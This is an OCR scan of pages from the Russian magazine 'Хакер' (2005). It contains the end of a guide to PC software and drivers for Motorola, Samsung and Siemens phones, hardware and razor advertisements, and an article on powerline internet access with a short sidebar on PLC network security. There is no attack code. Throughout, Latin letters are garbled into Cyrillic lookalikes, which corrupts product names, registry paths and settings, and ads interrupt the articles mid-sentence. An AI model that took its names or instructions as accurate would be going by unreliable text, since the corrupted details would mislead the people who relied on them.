ж) Вынимаем кабель из телефона, ждем 5 секунд, снова включаем. ѴѴіп- 
сІоѵѵз находит новые устройства. Указываем ей путь к драйверам в ко- 
рень РЗТ, как делали раньше. 

2 Открываем наш сохраненный М-Зегѵісе Васкир Рііе. 

[2 РЗТ показывает информацию о файле — один графический файл и 
три мелодии. 

12 Нажимаем кнопку «ѴѴгіІе іпіо ІНе рИопе». Зеленые галки — все выста- 
вляем в положение ОК, если будут красные — у нас проблемы, пробуй 
еще раз. Возможная ошибка — слишком большой размер файла с рас- 
ширением етз и малое количество свободной памяти в телефоне. С по- 
мощью программы РЗТ можно заменить картинку, которая показывает- 
ся при включении/выключении телефона. Это, как понимаешь, может 
быть и анимационный ОІР-файл ;). 

Ну вот, наконец, добрались и до обладателей «моторолок» нашего ве- 
ка. Им повезло больше, путь предстоит менее долгий. Перед первым 
подключением телефона к компьютеру необходимо установить драйвер 
Моіогоіа ІІЗВ Огіѵег. В интернете полно ссылок на него, поэтому найти 
его не составит труда (размер ~1.2 МЬ). После установки перезагружа- 
ем компьютер. Подключаем телефон к ІІЗВ. 

Окрываем «Свойства системы» и убеждаемся, что появился Моіогоіа 
ІІЗВ Мобет. Открываем «Панель управления -> Модемы». Нажимаем 
кнопку «Свойства» и лезем во вкладку «Диагностика». Жмем «Опро- 
сить модем». Должны получить ответ модема. Если «отклик модема» не 
получен, придется опять ковырять систему. Как и в предыдущем случае, 
проблема возникает, если в системе есть простой модем. Попробуй пе- 
реставить модем на другой СОМ-порт. Если все нормально — идем 
дальше. В принципе, этого драйвера достаточно, чтобы программа ра- 




обновленное антивирусное ядро с многократно улучшенной антивирусной функциональностью 
детектирование шпионских (5руѵѵаге) # рекламных (Асіѵѵаге) и других нежелательных программ 
эффективная антивирусная защита серверов под ѴѴіпсіоѵѵб N1/2000/2003 Бегѵег 

значительно увеличенный список проверяемых форматов файлов и обрабатываемых упаковщиков 
существенно расширены средства администратора для управления ЕпІегргІБе Биіііе 
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Обновления программных модулей и вирусных баз осуществляется немедленно по мере обнаружения новых угроз! 
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ботала в режиме АТ-тосІе. Но этого не достаточно для работы в Р2К- 
тобе. Запускаем программу в режиме Р2К-тосІе и жмем кнопку «Под- 
ключить». ѴѴіпсІоѵѵз должен найти новые устройства. Драйвера для них 
лежат в папке с программой в подкаталоге /с/л/. При успешной установ- 
ке должны появиться новые устройства: Ассеззогіез Іпіегіасе, Оаіа І_од- 
діпд МСІІ и т.д. Если у тебя ѴѴіпсІоѵѵз ХР, то необходимо отредактировать 
реестр ѴѴіпсІоѵѵз. Как это сделать — читаем дальше. 

[настройка работы с ѴѴіпсІоѵѵз ХР] Если после установки всех драйверов 
в «Диспетчере устройств» появилось предупреждение, и программа не 
хочет устанавливать связь с телефоном в режиме Р2К-тосІе, то необхо- 
димо отредактировать реестр ѴѴіпсІоѵѵз ХР. 

Запускаем гедесШ.ехе и переходим в ветку НКЕѴ_І_ОСАІ__МАЗНІІ\ІЕ\ЗѴ- 
ЗТЕМ\СиггепЮопІгоІЗеІ\Епит\ІІЗВ. Меняем «Разрешения...» для ветки 
ІІЗВ — «Полный доступ». 

Удаляем все ветки, начинающиеся на Ѵіб_22Ь8&РісІ_5801 .... Внутри са- 
мой ветки Ѵіб_22Ь8&РісІ_5801 должна быть еще одна ветка. Не важно, с 
каким названием, у меня она называется 5&1сІ9асІсЗс&1&1 . Находим па- 
раметр Зегѵісе со значением изЬсдр и меняем его на изЫіиЬ. 

Внутри ветки, с которой мы только что работали, есть еще одна с назва- 
нием Сопігоі. В ней есть параметр АсІіѵеЗегѵісе — изменяем его значе- 
ние на изЫіиЬ. Вынимаем кабель из телефона, ждем 5 секунд, снова 
включаем. Запускаем программу Р2КТооІз и опять делаем попытку под- 
ключиться. ѴѴіпсІоѵѵз находит новые устройства. Указываем путь к драй- 
верам (драйвера находятся в папке с программой в каталоге /с/л/). 
Теперь можно полноценно работать с программой. 

Подробное описание того, как воспользоваться данной программой, можно 
прочитать в файле помощи, так как обычным переписыванием я занимать- 
ся не хочу — устал писать про американцев, поэтому переходим к Затзипд. 

[ЕазуЗіисІіо РІМЗ & Рііе Мападег АМО ЕазуОРВЗ] Хотя данные софтины 
и названы с приставкой Еазу, на самом деле это совсем не так — голов- 
ную боль с их установкой придется поиметь. 

Если у тебя, мой друг, кабель с СОМ-портом, то тебе несказанно повез- 
ло, так как тебе просто надо установить эти программы и выяснить, ка- 
кая из них подходит к твоему телефону. К сожалению, точно сказать, 
что к чему подходит, я не могу. 

А теперь те, кому не повезло. Вам придется найти две «штучки», но сам- 
ое противное не в этом, а в том, что придется покупать ИК-порт в допол- 
нение к кабелю. Это обязательное условие — иначе ничего работать не 
будет (сколько я не проверял, на каких только «машинах» и телефонах). 
Так вот, о тех двух «штучках». Это, во-первых, ІгСОММ2к — эмулятор 
ИК-порта, превращает его в обычный СОМ-порт, а во-вторых, изЬ2сот 
определяет твой ІІЗВ-шник, как обычный СОМ-порт, с которым будет 
работать наша программа. 

В режиме работы с программой ЕазуОРВЗ или ЕазуЗіисІіо не допускай 
полной разрядки аккумулятора телефона, перед использованием убе- 
дись в том, что он заряжен. 

Данные программы позволяют записывать мелодии, изображения, редакти- 
ровать записную книжку, органайзер отправлять ЗМЗ и электронную почту. 
Установи номер порта, куда подключен кабель. Для этого нажми Рііе -> Зеіир. 
Установи нужный порт и кликни ОК. Затем нажимаешь кнопку «Обновить 
ВЕ», после чего должно начаться соединение с испытуемым телефоном. По- 
сле успешного коннекта должен появиться список всех записей в телефоне. 
Запись мелодий: нажимаем кнопку «Запись мелодий», дальше жмаха- 
ем на ЗЕІ_ЕСТ и выбираем мелодию в формате МЕР. После данной опе- 
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ЕазуОРВЗ — настройки программы 



рации мелодия должна записаться в телефон. Если нет, то первона- 
чального коннекта не произошло — попробуй перезапустить програм- 
му. В этом же месте ты можешь послушать мелодию, которую выбрал 
(звучит почти так же, как будет звучать и на твоем мобильнике). Запись 
изображений: нажимаем кнопку «Записи изображений». Все дальней- 
шие операции делаются аналогично записи мелодий. Хоть что-то в 
этой программе сделано по уму. А вот с играми обладателям Затзипд 
не повезло. Видимо, производители считают, что они не нужны вла- 
дельцам сотовых телефонов, и поэтому закачка их в телефон очень 
сложна — производить ее в «домашних» условиях я не рекомендую, а 
потому описывать не буду. 

[программы для Зіетепз] Большинство моделей компании Зіетепз, в ко- 
торых подразумевается связь с компьютером, могут быть подключены к 
нему при помощи кабеля для передачи данных. В таких моделях бизнес- 
варианта, как 355, 365, СХ1, можно также использовать ВІиеІооІН. Для 
всех моделей Зіетепз подойдет полифония формата тібі 16 тонов. Неко- 
торые модели (например, М55) поддерживают также форматы ѵѵаѵ и трЗ. 
Есть также модели (например, ЗІ_55), которые понимают и воспроизводят 
формат южнокорейского производителя сотовых телефонов тті. Кроме 
того, большинство моделей этой марки проигрывают свой формат мело- 
дий гіе. В любом случае, прежде чем закачивать мелодию, поинтересуй- 
ся о технических характеристиках трубки, какой формат мелодий она по- 
нимает. На софте для сименсов подробно останавливаться не буду, так 
как он не блещет функциональностью, да и установка его проста как два 
пальца об асфальт. Поэтому скажу лишь пару слов об ЗіМоСо — Зіетепз 
МоЬіІе Сопігоі. Эта софтинка интересна только разнообразием поддержи- 
ваемых моделей, среди которых: 325, С35(і), М35, 335(і), ЗІ_42(і), ЗІ_45(і), 
С45, 345(і), МЕ45, М,МТ50, С55, 355, ЗІ_55, М55, А60, С60, МС60, СР62, 
С65, М65, СХ65, 365, и этот список периодически пополняется. 

[вместо злоключения] Ну вот кто-то спросит, почему не пишем про Золу, 
Егісззоп и І_0. Про софт для мобил этих контор мы с ІІ_иха писать вооб- 
ще не хотим. На наш взгляд, еще не запрограммили достойного ПО для 
них, а следовательно, дилемма выбора остается за тобой. Если что, 
бомби наши мыльники вопросами — мы постараемся на них ответить. 
На этом позволь раскланяться и удалиться © 




ОРМ — основное окно программы 






РОХСОПП 

Асіѵапсіпд ТИгоидЬ Іппоѵаііоп 

Наследие тысячелетий 

в технологиях будущего. 




• Чипсет ІпсеІ 955Х; поддержка ОиаІ Соге СРЕІ; 

• Р5В 1066/800 МНг; 

• ОиаІ сИаппеІ ООЯ2 533/667 х4 ОІММз ѵѵііН ЕСС; 

• Р-АТА х 3, 5- АТАМ х 4, 5- АТА х 4; 

• РСІехІб, ЗхРСІех I; 

• 7.1 сНаппеІ, НАР; 
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Рохсопп - торговая 
марка Ноп Наі Ргесізіоп 
Іпсіизігу Со., Ш - мирового лиде- 
ра в области высокотехнологичных 
решений. Рохсопп - крупнейшая частная 
тайваньская компания, №1 в мире по ОЕМ- 
поставкам системных плат, разъемов и 
корпусов для ПК, №2 в мире по выпуску 
систем охлаждения. В 2004 году объем 
продаж компании превысил $16 млрд. 
Количество сотрудников, занятых на 
предприятиях Рохсопп 
по всем странам 
мира, более 
160 тысяч 
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Собственное производство высококачественной стали • Лицевые панели изготовлены в соответствии со стандартами ведущих мировых производителен 
Легендарные блоки питания Р5Р, НіРго, СѴѴТ • Сборка ПК без использования инструмента во всех моделях корпусов 
Дополнительные вентиляторы и 115В панели в базовой конфигурации • Более 100 моделей во всех ценовых категориях 
Широкий ассортимент вентиляторов для процессоров АМР и Іпіеі 



• ОиаІ Вгоасісот СЬЕ І_АЫ; 

• ІЕЕЕ І394Ь& 1394а (РігеѴѴіге); 

• до 8 портов 115В 2.0 



Чипсет Іпіеі 915РІ_; 

ЮА775 для ІпТеІ Репііит 4ЕЕ/Рге$сои СРІІ; 
Р5В800; ОиаІ сЬаппеІ 00К 400/333 х 2 ОІММб; 

1 х Р-АТА, 4 х 5-АТА 1 50 (КАЮ 0, 1, 0+1); 

Аисііо 7.1; СЬЕ І_АЫ; ІЕЕЕ 1394а; 
до 8 портов 115В 2.0; 

1 х РСІе х 16, 1 х РСІе х 1, 3 х РСІ, 1 х РСЕ 8Х; 
Рохсопп Р.С.Е. 8Х совместим с АСР 8Х, 
поддержка 2х мониторов 
(ѴѴіпсіоѵѵб 2000/ХР) и МісгобоЛ: РігесіХ 9.0. 



Чипсет пѴЮІА ЫР4 Шіга; 

Боскеі 939 для АМ0 АіЫоп™ 64/64РХ СРІІ; 

Р5В 2000 МТ/Б, НурегТгапБрогі™; 

до 4СВ ОиаІ сЬаппеІ ООК400/ООКЗЗЗ/ООК266; 

1 х РСІеХІб, 2 х РСІе XI, 4 х РСІ; 

4 х Бегіаі АТА II (КАЮ 0, 1, 0+1); 

Аисііо 7.1, АС97; СЬЕ І-АЫ, ІЕЕЕ 1394а; 
до 8 портов 115В 2.0 



Москва: Ргопеідгоир - (095) 789-3846; Шіга Сотриіегз - (095) 775-7566; Инкотрейд - (095) 785-8659; Кит - (095) 777-6655; Компьютадор - (095) 274-7300; НИКС - (095) 974-3333; Полярис - (095) 755-5557; 
Альметьевск: Компьютерный мир - (8553) 25-38-29; Волгоград: ЮКК МТ - (8442) 49-19-20; Краснодар: Игрек - (8612) 210-98-50; Красноярск: КАПИТАЛ-СЕРВИС - (3912) 63-60-30; Курск: КомпьюЛэнд - (0712) 56-46-43; 
Курчатов: КомпьюЛэнд - (07131) 2-31-22; Липецк: Регард - (0742) 22-13-09; Набережные Челны: КЦ "Ыехі сотриіег" - (8552) 39-03-38; Нижнекамск: КЦ "Ыехі сотриіег" - (8555) 43-79-82; Нижний Новгород: АйТиОн - (8312) 74-85-90; 
ВИСТ-НН 000 - (8312) 78-48-78; Ником-Медиа (8312) 34-11-34; ЮСТ - (8312) 30-16-74; Новосибирск: ЗЕТ ИСК - (3832) 125-142; Новый Уренгой: Все для офиса - (34949) 5-55-55; Омск: ТНТ 000 - (3812) 36-82-42; 
Электронный рай - (3812) 51-04-04; Рязянь: Шіга - (0912) 205-205; Самара: Прагма - (8462) 16-32-87; Саратов: АТТО - (8452) 444-111; Томск: Стек - (3822) 554-554; Улан-Удэ: Снежный Барс - (3012) 43-00-00, 43-55-15; 
Хабаровск: Диалог Плюс - (4212) 50-37-06; Дальком - (4212) - 42-86-72; Челябинск: Алиас - (3512) 37-8717; Чита: Вавилон - (3022) 32-55-00. 



А5ВІ5 

ѵѵѵ/ѵ/.аБЬіБ.ги 






Оіпа Ѵісіогіа 

ѵѵѵм.сіѵсоппр.ги 



т~гІіоп 



МЕкиом 

ѵѵѵѵѵѵ.тегііоп.ги 




Тринити Лоджик 

ѵѵѵѵѵ/.ІІ-с.ги 
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032 

Интернет 
из розетки 

ОТВЕТСТВЕННО ЗАЯВЛЯЮ: ИНТЕРНЕТ-ТЕХНО- 
ЛОГИИ В РОССИИ ДВИЖУТСЯ ВПЕРЕД. И ЭТО 
КАСАЕТСЯ НЕ ТОЛЬКО МОСКВЫ, ГДЕ УЖЕ НЕС- 
КОЛЬКО ЛЕТ КАЖДЫЙ ЖЕЛАЮЩИЙ МОЖЕТ 
ПОЛУЧИТЬ НЕДОРОГОЙ И ВЫСОКОСКОРОСТ- 
НОЙ ДОСТУП ВО ВСЕМИРНУЮ ПАУТИНУ с по- 
мощью АЭЗІ_ ИЛИ ДОМАШНИХ СЕТЕЙ. ЭТО КА- 
САЕТСЯ И РОССИИ В ЦЕЛОМ. И ПОЯВЛЕНИЕ НА 
РЫНКЕ ТАКОЙ ТЕХНОЛОГИИ, КАК «ИНТЕРНЕТ 
ИЗ РОЗЕТКИ» — ЛИШНЕЕ ТОМУ ПОДТВЕРЖДЕ- 
НИЕ I Степан Ильин ака Зіер (5Іер@геаІ.хакер.ги) 



Изучаем 

новую технологию 
доступа в и нет 

[неужели это возможно?] Сообщения о 
технологиях, позволяющих передавать цифро- 
вую информацию через обычные электричес- 
кие линии, уже упоминались в новостях. Одна- 
ко мы не уделяли им должного внимания, так 
как считали, что это прерогатива более циви- 
лизованных стран, где дома редко горят от ко- 
ротких замыканий, проводку ежегодно прове- 
ряют и проводят ремонтно-монтажные работы. 
Признаться, еще недавно я с трудом мог предс- 
тавить, каким образом нашу ветхую и убогую 
проводку, электрические распределители, ко- 
торые, в лучшем случае, были установлены 
10 — 20 лет назад пьяными электриками, можно 
использовать для передачи цифровых данных. 
Не верил до самого последнего момента и вся- 
чески спорил с теми, кто считал иначе. Даже 
сообщения о том, что иностранные инвесторы 
хотят вложить в развертывание сети на основе 
этой технологии 4 миллиона долларов, не мог- 
ли меня убедить в обратном.... Но когда я уви- 
дел, что это чудо все-таки работает, я понял, 
насколько я ошибался. 



[технологии бывают разные...] Исследо- 
вания в области передачи данных по обычным 
электрическим линиям начались еще 30 лет 
назад. Разработкой занимались сразу несколь- 
ко десятков научно-исследовательских инсти- 
тутов по всему миру — настолько велико было 
искушение разработать технологию, с по- 
мощью которой легко можно было «срубить 
куш». Только вот незадача: слабая помехоза- 
щищенность используемого канала сводила 
все попытки разработчиков на «нет». В то вре- 
мя не существовало ни одной серьезной техно- 
логии, которая помогла бы обойти эти ограни- 
чения, поэтому действующих разработок не 
было до самого начала 90-х годов. Все измени- 
лось после появления современных сигнально- 
цифровых процессоров и новых методов моду- 
ляции сигнала. Именно они и способствовали 





Вся информация приведе- 
на в целях ознакомления. 
Автор и редакция не несут 
ответственности за тех, 
кто, решив поэксперимен- 
тировать, вставит в розет- 
ку модем, сетевуху или 
собственную голову. 



развитию РІ_С-технологий (Роѵѵег 
І_іпе Соттипісаііоп). Очень скоро 
на рынке появилось сразу нес- 
колько разработок, которые ис- 
пользовали существующие сети 
электропитания (120 или 220 В) 
для успешной передачи данных. 

Не стоит считать, что все эти тех- 
нологии изначально разрабатыва- 
лись, как еще один быстрый и удобный способ обеспечения доступа в 
Интернет. На самом деле, их применение значительно шире. Так, в за- 
висимости от задач выделают несколько типов подобных технологий. 
Первые — низкоскоростные (скорость иногда ниже, чем 0.01 Кбит/с) — 
стали использовать в энергетике на высоковольтных магистралях для 
передачи информации о напряжении на подстанциях и прочей техничес- 
кой информации. Скорость, конечно, не фонтан, но вполне приемлема 
для передачи небольших объемов информации. Тем более, на расстоя- 
нии в десятки километров. Второй тип — обмен со средней 0.01 — 50 
Кбит/с скоростью на расстоянии до 2 — 3 километров — также использу- 
ется в основном энергетиками, но в отличие от предыдущего типа поз- 
воляет обеспечить дистанционное управление и контроль над различ- 
ными объектами, мониторинг самых разнообразных характеристик и 
т.п. Для нас же наибольший интерес представляет высокосортная пере- 
дача данных. Разработчики, которые начинали заниматься такими тех- 
нологиями, планировали, что они будут использоваться для создания 
так называемого «интеллектуального дома», в котором любые бытовое 
приборы будут общаться между собой посредством обычной проводки и 
координироваться специальными девайсами. В сфере компьютеров та- 
кие возможности выглядели еще более убедительно — наконец-то уда- 
лось бы избавиться от кучи ненужных проводов, соединяющих компью- 
тер со сканерами, принтерами и прочей периферией. Однако быстрее 
всего такие технологии стали использовать для предоставления высо- 
коскоростного доступа в Интернет! 



[домашняя проводка, она же Зло] Вооб- 
ще, представить то, что через розетку можно 
получить передавать данные со скоростью до 
20 Мбит/с (а именно эту цифру предлагают ны- 
нешние технологии), можно с трудом. Если 
брать обычный ЕІНегпеІ, то никаких сомнений 
не возникает. Используемые проводники были 
изначально предназначены для высокоскоро- 




покупая РЮ-адаптер 
нужно убедиться, что 
бы на нем был изоб- 
ражен этот логотип 







стной передачи данных. Более то- 
го, на используемый кабель нак- 
ладывается целый ряд ограниче- 
ний: по его качеству, категории 
(напомню, что существует нес- 
колько категорий витой пары), 
максимальной длине и правилам 
монтажа. Так что ничего удиви- 
тельно в высоких скоростях нет. 
Другое дело — наша отечествен- 
ная проводка. Ты только вспомни 
эти ветхие провода, которые в 
большинстве случаев проложены 
десятилетия назад. Мало того, 
что они имеют кучу изгибов и 
повреждений, а также наспех 
спаянных сцепок, так по ним еще 
передается электроэнергия под 
высоким напряжением! Проведу 
аналогию: представь, что тебе 
внезапно захотелось поплавать, 
и ты решил пойти в бассейн. В 
бассейне всегда выдержан тем- 
пературный режим (то есть ты не 
заболеешь), вода очищена хлор- 
кой (ты не подцепишь инфекцию, 
которую принесли другие купаль- 
щики), да и вообще, все сделано 
для того, чтобы процесс купания 



т 



т 



Основная трудность раз- 
вертывания РІС в регионах 
— отсутствие широкого 
интернет-канала до Моск- 
вы. Если «Электро-ком» 
всерьез планирует подклю- 
чить сотни тысяч абонен- 
тов, то ему этот вопрос ка- 
ким-то образом придется 
решать. Тем более что для 
поддержки ѴоІР (телефо- 
ния через Интернет) потре- 
буется канал, имеющий 
минимальные задержки. 

Технологию РІС совер- 
шенно необязательно ис- 
пользовать для доступа в 
Интернет. С помощью обо- 
рудования, соответствую- 
щего спецификации 
Нотеріид, можно органи- 
зовать вполне работоспо- 
собную локальную сеть. 

О результатах подобного 
применения технологий 
можно прочитать здесь — 
шшш.іхЫ.сот/сошт/ршгІп- 
ротг-пеі.зіііті. 



был максимально комфортен и 

безопасен. Точно также чувствует себя цифровые данные, которые 
передаются по хорошим медным или оптоволоконным проводникам. 
А теперь (слабонервных прошу удалиться) представь, что ты искупал- 
ся в емкости с концентрированной соляной кислотой. Думаю, не нуж- 
но объяснять, что бы с тобой стало? :) То же самое происходит и с сиг- 
налом, который без предварительной обработки и использования 
специальных технологий пустили через обыкновенную электрическую 
проводку. Постоянные наводки и высокий коэффициент затухания 
сразу же сведут его на нет, прежде чем он успеет пройти каких-то па- 
ру-тройку метров. Это легко можно объяснить. 

Нужно понимать, что электрическая проводка предназначена для пе- 
редачи электроэнергии — и только. Даже если ее умело проложить, 




сигнал в розетку поступает 
с помощью специальных 
девайсов — инъекторов 



качественно спаять все соедине- 
ния и использовать исключитель- 
но хороший провод, этого вряд ли 
будет достаточно для передачи 
данных. Дело в том, что частот- 
ные характеристики электричес- 
кого кабеля даже по самым 
скромным оценкам не сравнимы 
с теми, которыми обладает, нап- 
ример, витая пара. Суди сам: ес- 
ли у тебя нет хорошего музыкаль- 
ного голоса, ты вряд ли сможешь 
правильно брать высокие ноты. В 
свою очередь, кабель не сможет 
быстро передавать цифровой 




посмотрев на схему, становится ясно, что ключевой элемент технологии 
— это специальный адаптер, который вставляется в обыкновенную ро- 
зетку (на схеме — РІ_С-модем) 



[ХАКЕР 10 [82] 05 > 








[ХАКЕР 10 [82] 05 > РС_20ЫЕ 034 ] 




сигнал, обладая недостаточными частотными характеристиками. С 
другой стороны: если на эстраде есть люди без голоса, значит, и 
обычную проводку можно заставить передавать данные? :) Для этого 
разработчикам РІ_С пришлось использовать специальные схемы и ал- 
горитмы представления и кодирования сигнала, о которых мы очень 
скоро поговорим подробнее. Однако недостаточные частотные харак- 
теристики — это не единственная проблема. 

Трудность заключается еще и в том, что параметры среды внутри 
проводки постоянно изменяются. Они напрямую зависят от напряже- 
ния, которое идет от распределительного щитка, количества одновре- 
менно включенных в цепь приборов, а также других факторов. Каж- 
дый раз, когда включаешь в комнате свет, подогреваешь обед в мик- 
роволновке, ты незаметно для себя изменяешь среду внутри прово- 
дов, причем не только в своей квартире, но и у соседей. Мало того, 
некоторые электроприборы (например, банальный пылесос) способ- 
ны сильно «шуметь» и генерировать серию непродолжительных им- 
пульсов, которые создают в проводке самую настоящую «кашу». Ну и 
напоследок ответь на вопрос: тебе когда-нибудь приходилось опера- 
тивно делать простенькую антенну из куска проволоки? Наверняка. А 
ведь провода электролинии, несмотря на то, что замурованы в стену, 
очень неплохо принимают радиоволны большинства радиостанций, 
среди которых могут оказаться и те, которые используют ту же поло- 
су частот, что и технологии РІ_С. 

[модуляция сигнала] Понятно, что решить все эти проблемы в 
одиночку чрезвычайно сложно. Поэтому в конце девяностых годов 
был образован специальный альянс Нотеріид РоѵѵегЫпе АІІіапсе, в 
состав которого вошли такие известные компании, как ЗСот, Сізсо 
Зузіетз, НеѵѵІеК-РаскагсІ, Іпіеі, АМО. Основная задача альянса, кото- 
рый начал заниматься разработкой первой версией стандарта 
Нотеріид 1.0, заключалась в выборе оптимальной схемы модуляции 
сигнала, которая могла бы справиться с ужасной зашумленностью 
электрической проводки. В 2000 году среди десятков предложенных 
вариантов, была официально выбрана схема ортогонального разде- 
ления частот ОРОМ (ОгІНодопаІ Ргециепсу Оіѵізіоп МиШрІехіпд). Эта 
схема уже успела хорошо зарекомендовать себя в беспроводных ѴѴі- 
Рі сетях (802.1 1д и 802.11а), которые также подвержены самым раз- 
нообразным помехам и влиянию окружающей среды. 

Но что вообще представляет собой понятие «метод модуляции»? Если 
говорить простым языком, то это способ представления и передачи ин- 
формации. Объясняю на пальцах. Допустим, тебе нужно переслать 
большущий файл — твои действия? В принципе, это можно сделать по 
е-таіі, однако в этом случае велика вероятность того, что из-за своего 
размера письмо осядет на почтовом сервере и до адресата не дойдет. 
Поэтому лучше будет, например, разделить файл на несколько неболь- 
ших частей и отправить их по отдельности, или же вообще воспользо- 



ваться РТР, который поддерживает докачку. Цифровой сиг- 
нал аналогично файлу также можно представить и пере- 
дать различными способами. Так вот, эти способы по-умно- 
му и называются методами модуляции. 

Что касается конкретно ОРОМ, то он изначально ориен- 
тирован на высокоскоростную передачу больших объе- 
мов цифровой информации. Основная фишка заключа- 
ется в том, что сигнал умышленно разделяется на десят- 
ки несущих частот (грубо говоря, частей), по которым 
одновременно начинает осуществляться передача ин- 
формации. На приемнике данные с различных частот де- 
модулятором собираются воедино. Помимо этого ис- 
пользуется несколько дополнительных несущих частот, 
по которым передается исключительно техническая ин- 
формация, необходимая для проверки целостности дан- 
ных, а также, что очень важно, восстановления утерян- 
ных данных. Если из-за каких-то помех или особеннос- 
тей проводника информация по одной или нескольким 
несущим была искажена, то общий сигнал не пострада- 
ет, так как он достаточно просто может быть скорректи- 
рован. Столь эффективное использование спектра поз- 
воляет достичь огромной плотности битов и передавать 
данные на очень высоких скоростях. 

[решение проблем] По умолчанию для передачи ис- 
пользуется диапазон частот от 4 до 21 МГц, однако в неко- 
торых случаях он несколько уже. Это может быть связано с 
особенностями проводника, не позволяющими использо- 
вать те или иные частоты, а также с ограничениями, кото- 
рые накладывает законодательство некоторых стран. Так 
или иначе, весь диапазон делится на 84 независимых друг 
от друга несущих, которые могут 
передавать данные со скоростью 
до 20 Мбит/с. Во время передачи 
данных на некоторых несущих мо- 
жет резко возрастать коэффици- 
ент затухания сигнала, что, естест- 
венно, ведет к частичной или пол- 
ной потери информации. Метод 
ОРЭМ может скорректировать 
данные, но для успешного функци- 
онирования ему требуется помощь 
со стороны. Своеобразным по- 
мощником является функция ди- 
намического управления несущи- 
ми (ОупатісаІІу Іигпіпд оІІ апб оп баіа-саггуіпд зідпаіз), суть которой зак- 
лючается в постоянном мониторинге канала передачи с целью выявле- 
ния тех участков спектра, где коэффициент затухания превышает неко- 
торое пороговое значение. Если такие частоты обнаружены, то их ис- 
пользование прекращается ровно до тех пор, пока затухание сигнала не 
вернется к уровню нормы. 



БЕЗОПАСНОСТЬ РЬС-СЕТЕЙ 

Вообще, безопасность использования РІ_С-сетей пока под 
большим сомнением. Ведь внутри дома для передачи дан- 
ных используются одни и те же провода слаботочной про- 
водки. Уверен, что если эта технология выйдет в широкие 
массы, то очень скоро появятся специальные сниферы, 
которые небезуспешно будут перехватывать все идущие 
по РІ_С пакеты. Чтобы не допустить несанкционированно- 
го доступа к информации, большинство производителей 
встраивают в свои РІ_С-адаптеры специальные средства- 
ми шифрования «на лету», основанные на алгоритме 
йЕЗ. Однако шифрование может быть включено только в 
том случае, если его поддерживает коммутирующее РІ_С- 
оборудование. Для обеспечения безопасности РЮ-марш- 
рутизаторы имеют специальную систему контроля досту- 
па, разрешая подключение только тем из абонентов, кото- 
рые прошли авторизацию (по логину/паролю, МАС-адресу 
адаптера и т.д.). Однако и эту защиту, скорее всего, 
удастся обойти, если получится выловить из «эфира» 
нужную идентификационную информацию. В итоге полу- 
чаем уровень защиты, сравнимый с беспроводными сетя- 
ми, а это явно не предел мечтания. 




мониторинг соединения с другими 
компьютерами, соединенными 
с помощью РІ_С. Скорость до 13 
Мбит/с, жаль только, что софт 
немецкий 







Товар сертифицирован 



Создай свой стиль 



У Майкла это есть, и Кристин это нравится. 
Борода снова в моде! Но, поверь, девчонки 
не в восторге от беспорядочной 



растительности на лице. Здесь важен стиль. Обычная борода плюс твое воображение, и ты станешь другим 
человеком. Все что тебе надо - подходящая идея и инструмент, чтобы ее осуществить. 




Главное - суперидеи! 

Не стоит пренебрегать «эспаньолкой» - небольшой остроконечной бородкой. 
Совсем короткая или чуть длиннее, она всегда выглядит прикольно. 

Если хочешь порадовать подружку, просто оставь небольшой участок волос 
на выбритой коже под нижней губой - «заплатку для души». Смотрится очень 
аппетитно. Может, добавить бородку или усы? Приветствуются самые смелые 
идеи. Только учти, что любая растительность на твоем лице должна иметь четкие 
контуры. 

Семидесятые возвращаются! Бакенбарды дают большой простор для фантазии. 
Короткие и узкие, длинные и широкие, вертикальные или горизонтальные, 
треугольной или прямоугольной формы - они открывают безграничные 
возможности для создания собственного стиля. Удлини их до подбородка, 
и они плавно перейдут в бороду. 

«Баки» зрительно сужают круглое лицо, а трехдневная щетина придает реально 
мужественный вид. «Эспаньолка» и «заплатка» акцентируют внимание на 
подбородке и идут тем, у кого овальное лицо. 

Совет: Если хочешь, чтобы растительность на лице выглядела круто, не забудь 
о симметрии. Ориентируйся на свои черты лица: губы, уголки рта, нос, уши, 
скулы - это отправные точки для создания стиля бороды. За идеями и другими 
полезными советами зайди на ш/ѵѵ.Ьгаип.ги 

Как бриться? 

Создавать свой собственный стиль лучше всего с помощью электробритвы 
со съемной насадкой-триммером, чтобы пена не мешала процессу. Прежде чем 
приступить, убедись, что твоя кожа сухая и чистая. 

Сначала используй бритву с четырехуровневой насадкой-триммером для 
подравнивания бороды, чтобы достичь необходимой длины волосков. Затем, сняв 




Если хочешь узнать больше о стильном бритье, зайди на ѴѴѴШ.Ьгаип.Ш 



насадку, сделай четкий контур бреющей сеткой электробритвы. После чего сбрей 
все лишнее. Всегда держи бритву под прямым углом к коже. Ополосни лицо водой. 
Готово! 

Бритва «три в одном» - стиль без ограничений 

Бритва, стайлер и триммер в одном - это Вгаші сш2ег 3 . Фишка в том, что бритва 
оборудована двусторонним вращающимся триммером. На обоих его концах 
имеются ножи: узкий - для четких прямых линий и сложных контуров, широкий - 
для равномерного подравнивания более крупных участков. Плюс сш2ег 3 оснащен 
четырехуровневой насадкой-триммером для поддержания желаемой длины 
бороды. С сш2ег 3 также возможно влажное бритье. Никакой душ не помешает 
этому суперустройству добраться до каждого волоска. С этой бритвой даже такой 
лентяй, как Майкл, будет выглядеть стильно. 

Ну, а если в результате ты окажешься «слегка волосатым» - наши поздравления! 
Либо ты создал новый стиль, либо попробуй еще раз. С сш2ег 3 неудачная попытка 
превратится в новый шедевр всего за одно мгновение. Если опять неудача - 
не отчаивайся! Щетина отрастет через пару дней, и ты снова можешь заняться 
созданием нового стиля. 

Создай свой стиль. 
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любое РЮ-устройство имеет свой 
МАС-адрес, совместимый со стан- 
дартами ЕІНегпеІ 



метод модуляции ОРЭМ подразу- 
мевает использование сразу нес- 
кольких перекрывающих друг 
друга несущих. На рисунке они 
изображены разными цветами 



Я уже упоминал о возможном воз- 
никновении в проводке коротких 
импульсных помех (продолжитель- 
ностью до 1 мс), источниками кото- 
рых являются галогеновые лампы и 
мощные бытовых приборы с элект- 
рическими двигателями. Для того чтобы исключить влияние этих непри- 
ятных помех, разработчики РІ_С стали использовать двухступенчатое по- 
мехоустойчивое кодирование информации. Принцип действия заключа- 
ется в избыточном кодировании данных, когда к набору информационных 
битов прибавляются еще так называемые защитные биты, используемые 
для восстановления испорченных во время передачи данных. 

В обычном ЕІНегпеІ сетевой кабель идет строго от точки А (например, 
свитча) к точке В (рабочей станции), не имея разветвлений или каких- 
либо еще негативно влияющих факторов. Зато в квартирной проводке 
все с точностью до наоборот: здесь всегда найдется немало мест, где 
силовой кабель разделяется, разветвляется, идет параллельно, а точ- 
ки соединения сделаны, что называется, «на соплях». Все это приводит 
